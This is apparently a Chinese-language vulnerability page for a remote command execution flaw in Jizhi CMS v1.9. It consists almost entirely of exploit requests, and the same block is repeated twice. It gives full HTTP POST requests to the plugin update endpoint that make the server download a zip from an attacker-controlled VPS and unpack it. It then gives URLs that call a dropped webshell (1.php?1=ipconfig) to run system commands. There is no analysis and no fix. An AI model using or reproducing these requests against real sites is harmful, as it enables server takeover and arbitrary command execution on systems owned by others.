极致CMS_遠程命令執行漏洞

# 极致CMS 遠程命令執行漏洞

==漏洞信息==
該漏洞首發於奇安信攻防社區，原文在[https://forum.butian.net/share/232 這裏]
==影響版本==
v1.9 All

action=start-download&filepath=3&download_url=http%3A%2F%2F（vps）%2F1.zip



POST /admin.php/Plugins/update.html HTTP/1.1
Host: 192.168.1.108
Content-Length: 80
Accept: application/json, text/j avas cript, */*; q=0.01
X-Requested-With: X MLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.108
Referer: http://192.168.1.108/admin.php/Plugins/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=g9470pcp62tg9og1a6798d3g23
x-forwarded-for: 8.8.8.8
x-originating-ip: 8.8.8.8
x-remote-ip: 8.8.8.8
x-remote-addr: 8.8.8.8
Connection: close
action=start-download&filepath=3&download_url=http%3A%2F%2F192.168.1.108%2F1.zip

action=file-upzip&filepath=3&download_url=

POST /admin.php/Plugins/update.html HTTP/1.1
Host: 192.168.1.108
Content-Length: 42
Accept: application/json, text/j avas cript, */*; q=0.01
X-Requested-With: X MLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.108
Referer: http://192.168.1.108/admin.php/Plugins/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=g9470pcp62tg9og1a6798d3g23
x-forwarded-for: 8.8.8.8
x-originating-ip: 8.8.8.8
x-remote-ip: 8.8.8.8
x-remote-addr: 8.8.8.8
Connection: close
action=file-upzip&filepath=3&download_url=

==URLs==

http://127.0.0.1//A/exts//1.php?1=ipconfig
http://127.0.0.1//A/exts/1/1.php?1=ipconfig

action=start-download&filepath=3&download_url=http%3A%2F%2F（vps）%2F1.zip

POST /admin.php/Plugins/update.html HTTP/1.1
Host: 192.168.1.108
Content-Length: 80
Accept: application/json, text/j avas cript, */*; q=0.01
X-Requested-With: X MLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.108
Referer: http://192.168.1.108/admin.php/Plugins/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=g9470pcp62tg9og1a6798d3g23
x-forwarded-for: 8.8.8.8
x-originating-ip: 8.8.8.8
x-remote-ip: 8.8.8.8
x-remote-addr: 8.8.8.8
Connection: close
action=start-download&filepath=3&download_url=http%3A%2F%2F192.168.1.108%2F1.zip

action=file-upzip&filepath=3&download_url=

POST /admin.php/Plugins/update.html HTTP/1.1
Host: 192.168.1.108
Content-Length: 42
Accept: application/json, text/j avas cript, */*; q=0.01
X-Requested-With: X MLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.108
Referer: http://192.168.1.108/admin.php/Plugins/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=g9470pcp62tg9og1a6798d3g23
x-forwarded-for: 8.8.8.8
x-originating-ip: 8.8.8.8
x-remote-ip: 8.8.8.8
x-remote-addr: 8.8.8.8
Connection: close
action=file-upzip&filepath=3&download_url=

http://127.0.0.1//A/exts//1.php?1=ipconfig
http://127.0.0.1//A/exts/1/1.php?1=ipconfig